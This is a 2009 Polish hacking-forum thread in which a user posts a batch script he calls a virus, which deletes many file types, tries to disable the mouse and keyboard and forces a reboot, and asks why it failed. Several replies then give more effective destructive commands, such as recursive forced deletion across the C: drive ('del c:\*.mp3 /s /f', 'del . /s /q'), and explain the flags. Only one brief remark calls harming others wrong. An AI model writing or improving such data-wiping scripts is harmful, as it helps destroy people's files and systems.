Malware w batch

Krystian108

Użytkownik
Dołączył
Wrzesień 3, 2009
Posty
43
Mam pytanie - czy wirus o takim kodzie w batchu by po prostu usunął wszystki pliki o wszystkich nazwach i rozszerzeniach:

@echo off
del *.*

bo logicznie mi się wydaje, że tak powinno być.

A czy trojan Trojan.Win32.KillFiles.ac opisany w tym temacie http://www.haker.com.pl/Zlosliwe-oprogramo...i-3-t35022.html działa pod kazdą wersją Windowsa?

Bo kiedyś odpaliłem przez przypadek malware o takim kodzie:

@echo off
start cmd.exe
start expoler.exe
start regedit.exe
del *.rar
del *.zip
del *.mp3
del *.xml
del *.lnk
del *.exe
del *.com
del *.bat
del *.avi
del *.mpeg
del *.mp4
del *.amr
del *.3gp
del *.jpg
del *.bmp
del *.gif
del *.ico
rundll32 mouse.disabled
rundll32 keyboadr.disabled
shutdown /r /60 /c "wirus"

pod windowsem 2000 i nic mi nie usunął ani nie pootwierał tylko jakiś komunikat błędu wyświetlił (ale przeczytać go czasu nie miałem bo z nerwów kliknąłem ok).

Przepraszam jeśli post brzmi dziwnie, proszę mnie nie banować
smile.gif
. Sądzę, że to temat dość istotny.
 

Levy272

Użytkownik
Dołączył
Luty 25, 2009
Posty
171
1. Najpierw sprawdź definicję "wirusa".
2. To nie jest żadne malware...
3. Komendy z rundll32 nie działają pod Windows NT.
 

Krystian108

Użytkownik
Dołączył
Wrzesień 3, 2009
Posty
43
<div class='quotetop'>CYTAT(Levy_PL @ 6.09.2009, 15:04) <{POST_SNAPBACK}></div>
1. Najpierw sprawdź definicję "wirusa".
2. To nie jest żadne malware...
3. Komendy z rundll32 nie działają pod Windows NT.[/b]
1.Wirus jest samoreplikującym się plikiem - wiem użyłem w potocznym (błędnym) znaczeniu
2.Malware to nie jest po prostu plik/program uszkadzający komputer
3.Masz jakieś pomysły czemu reszta kodu nie działała?
 

Legalnl

Użytkownik
Dołączył
Październik 8, 2008
Posty
828
Robisz np tak:
Kod:
 del c:\*.mp3 /s /f

po drugie szkodzenie innym nie jest dobre, pomysl jak bys Ty stracił wsystkie mp3, archiwa, filmiki, obrazki, aplikacje com, nie wspomne juz o exe.
 

Levy272

Użytkownik
Dołączył
Luty 25, 2009
Posty
171
Kod:
3.Masz jakieś pomysły czemu reszta kodu nie działała?

Prawdopodobnie dlatego, że nie ma podanego konkretnego adresu i aby to zadziałało, musiało by zostać (chyba) uruchomione z określonej lokalizacji.
 

Krystian108

Użytkownik
Dołączył
Wrzesień 3, 2009
Posty
43
<div class='quotetop'>CYTAT(legalnl @ 6.09.2009, 16:12) <{POST_SNAPBACK}></div>
Robisz np tak:
Kod:
 del c:\*.mp3 /s /f

po drugie szkodzenie innym nie jest dobre, pomysl jak bys Ty stracił wsystkie mp3, archiwa, filmiki, obrazki, aplikacje com, nie wspomne juz o exe.[/b]

A co tutaj robi to /s /f. Tzn. jaką to ma funkcję?
 

Legalnl

Użytkownik
Dołączył
Październik 8, 2008
Posty
828
ma to funkcje wymuszania usuwania plikow (f) oraz kasowania plikow w podkatalogach (s) i nastepnych i nastepnych i tak calej struktury.

po drugie takie rzeczy mozna przeczytać na google
 

mikulo

Użytkownik
Dołączył
Maj 13, 2009
Posty
14
1. taki wirus usuwa wszystkie pliki z folderu w którym jest umieszczony

Kod:
del . /s /q
a np. taki
Kod:
del *exe* /s /q
usuwa wszystkie pliki .exe
 
Do góry Bottom